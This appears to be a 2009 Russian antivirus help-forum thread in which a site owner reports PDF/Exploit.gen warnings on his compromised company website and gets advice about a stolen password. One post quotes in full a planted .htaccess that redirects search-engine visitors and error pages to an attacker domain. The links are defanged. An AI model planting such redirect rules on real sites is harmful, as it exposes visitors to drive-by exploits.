Показано с 1 по 15 из 15.

PDF/Exploit.gen (заявка № 53309)

  1. #1
    Junior Member Репутация
    Регистрация
    28.08.2009
    Сообщений
    10
    Вес репутации
    54

    Exclamation PDF/Exploit.gen

    На сайте tau.ur.ru и форуме Eset 4 при входе нашел такой вот вирус и закрывает окно браузера...весь сайт проверил и весь комп но так и не смог найти вирус проверял и AVZ 4.32 и Nod32 2.7
    прилагаю логи
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,100
    Вес репутации
    3023
    AVZ запущен из терминальной сессии
    Логи из локальной сессии нужны.

  4. #3
    Junior Member Репутация
    Регистрация
    28.08.2009
    Сообщений
    10
    Вес репутации
    54
    Цитата Сообщение от Rene-gad Посмотреть сообщение
    Логи из локальной сессии нужны.
    из локальной никак не сделать...сервер стоит не в офисе..а у хостера

  5. #4
    Junior Member Репутация
    Регистрация
    28.08.2009
    Сообщений
    10
    Вес репутации
    54
    вот логи, сделал подключившись радмином
    Вложения Вложения

  6. #5
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,100
    Вес репутации
    3023
    Ничего подозрительного не видно.
    Напишите в техподдержку ЕСЕТ, может ложняк.

  7. #6
    Junior Member Репутация
    Регистрация
    28.08.2009
    Сообщений
    10
    Вес репутации
    54
    Цитата Сообщение от Rene-gad Посмотреть сообщение
    Ничего подозрительного не видно.
    Напишите в техподдержку ЕСЕТ, может ложняк.
    на компе почти в каждлой папке сайта появился файл :
    .htaccess
    со след содержанием :
    ErrorDocument 400 xttr://ake.kz/in.cgi?8
    ErrorDocument 401 xttr://ake.kz/in.cgi?8
    ErrorDocument 403 xttr://ake.kz/in.cgi?8
    ErrorDocument 404 xttr://ake.kz/in.cgi?8
    ErrorDocument 500 xttr://ake.kz/in.cgi?8

    RewriteEngine On
    RewriteCond %{xttr_REFERER} .*google.* [OR]
    RewriteCond %{xttr_REFERER} .*ask.* [OR]
    RewriteCond %{xttr_REFERER} .*yahoo.* [OR]
    RewriteCond %{xttr_REFERER} .*excite.* [OR]
    RewriteCond %{xttr_REFERER} .*altavista.* [OR]
    RewriteCond %{xttr_REFERER} .*msn.* [OR]
    RewriteCond %{xttr_REFERER} .*netscape.* [OR]
    RewriteCond %{xttr_REFERER} .*aol.* [OR]
    RewriteCond %{xttr_REFERER} .*hotbot.* [OR]
    RewriteCond %{xttr_REFERER} .*goto.* [OR]
    RewriteCond %{xttr_REFERER} .*infoseek.* [OR]
    RewriteCond %{xttr_REFERER} .*mamma.* [OR]
    RewriteCond %{xttr_REFERER} .*alltheweb.* [OR]
    RewriteCond %{xttr_REFERER} .*lycos.* [OR]
    RewriteCond %{xttr_REFERER} .*search.* [OR]
    RewriteCond %{xttr_REFERER} .*metacrawler.* [OR]
    RewriteCond %{xttr_REFERER} .*bing.* [OR]
    RewriteCond %{xttr_REFERER} .*dogpile.*
    RewriteRule ^(.*)$ xttr://ake.kz/in.cgi?7 [R=301,L]
    Последний раз редактировалось Rene-gad; 31.08.2009 в 15:31. Причина: links disinfected

  8. #7
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,100
    Вес репутации
    3023
    Цитата Сообщение от Orekhov Посмотреть сообщение
    на компе почти в каждлой папке сайта появился файл :.htaccess
    http://en.wikipedia.org/wiki/Htaccess
    Что значит
    в каждлой папке сайта
    ???
    Указанный в предыдущем сообщении tau.ur.ru - это Ваш сайт и в папках - вирусы лежат?

  9. #8
    Junior Member Репутация
    Регистрация
    28.08.2009
    Сообщений
    10
    Вес репутации
    54
    Цитата Сообщение от Rene-gad Посмотреть сообщение
    http://en.wikipedia.org/wiki/Htaccess
    Что значит
    ???
    Указанный в предыдущем сообщении tau.ur.ru - это Ваш сайт и в папках - вирусы лежат?
    да этот сайт нашей компании а что значит в каждой папке объянсяю
    сайт стоит на 2003 серверной винде соответственно на IIS весь сайт лежит в папке inetpub/wwwroot/ и во многих папках сайта обнаружил вот такой вот файл какой написал и он явно не должен иметь там место..я его естественно везде помочил...но всё равно при заходе на сайт браузеры выдают придупреждения что мол на сайте вирус

  10. #9
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,100
    Вес репутации
    3023
    при заходе на сайт браузеры выдают прЕдупреждения что мол на сайте вирус
    Мой никаких базаров не устраивает: WinXP SP3 + Firefox 3.5.2 + KAV2010

  11. #10
    Junior Member Репутация
    Регистрация
    28.08.2009
    Сообщений
    10
    Вес репутации
    54
    Цитата Сообщение от Rene-gad Посмотреть сообщение
    Мой никаких базаров не устраивает: WinXP SP3 + Firefox 3.5.2 + KAV2010
    я щас опять пытался зайти на сайт и форум и есет4 у меня опять блокирнул
    pdf/exploit.gen который ломится на сайт hot77.biz чо то такое
    как эту сволочь на компе отловить ничо её не видит

  12. #11
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,100
    Вес репутации
    3023
    Цитата Сообщение от Orekhov Посмотреть сообщение
    я щас опять пытался зайти на сайт и форум и есет4 у меня опять блокирнул
    Ага, .. на форум Ваш меня и Файрвокс не пустил: атакующая страница, говорит. Кто-то взломал его, наверное.
    Надо у коллег спросить, что делать в таких случаях.

  13. #12
    Junior Member Репутация
    Регистрация
    28.08.2009
    Сообщений
    10
    Вес репутации
    54
    Цитата Сообщение от Rene-gad Посмотреть сообщение
    Ага, .. на форум Ваш меня и Файрвокс не пустил: атакующая страница, говорит. Кто-то взломал его, наверное.
    Надо у коллег спросить, что делать в таких случаях.
    очень надо
    щас наше ещё в несколбьких файлах сайта скрипт который вы мне писали в другой моей теме по этому сайту вроде подчитсил всё
    и логины сменил
    и AVPtool только что скачал и всё проверил чисто блин и всё тут

  14. #13
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,100
    Вес репутации
    3023
    Цитата Сообщение от Orekhov Посмотреть сообщение
    очень надо
    Запрос помощи публики сделан

  15. #14
    Junior Member Репутация
    Регистрация
    28.08.2009
    Сообщений
    10
    Вес репутации
    54
    Цитата Сообщение от Rene-gad Посмотреть сообщение
    Запрос помощи публики сделан
    и что есть ли результаты ?

  16. #15
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для AndreyKa
    Регистрация
    08.01.2005
    Адрес
    Россия
    Сообщений
    13,632
    Вес репутации
    1315
    Похоже, пароль доступа к сайту похитили, и на сайт заливают эксполойты.
    Меняйте пароль, проверяйте компьютеры, на которых этот пароль вводился.

  • Уважаемый(ая) Orekhov, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Exploit.JS.Agent.bab
      От Chabu в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 01.11.2010, 15:06
    2. Exploit attack
      От макс12 в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 12.03.2010, 20:47
    3. Exploit PDF9669
      От Don Peddie в разделе Malware Removal Service
      Ответов: 1
      Последнее сообщение: 09.01.2010, 11:02
    4. Intrusion.Win.PnP.exploit
      От usersed в разделе Помогите!
      Ответов: 3
      Последнее сообщение: 20.02.2009, 06:59
    5. Поймал Exploit
      От bazav в разделе Помогите!
      Ответов: 15
      Последнее сообщение: 13.02.2009, 22:15

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00712 seconds with 20 queries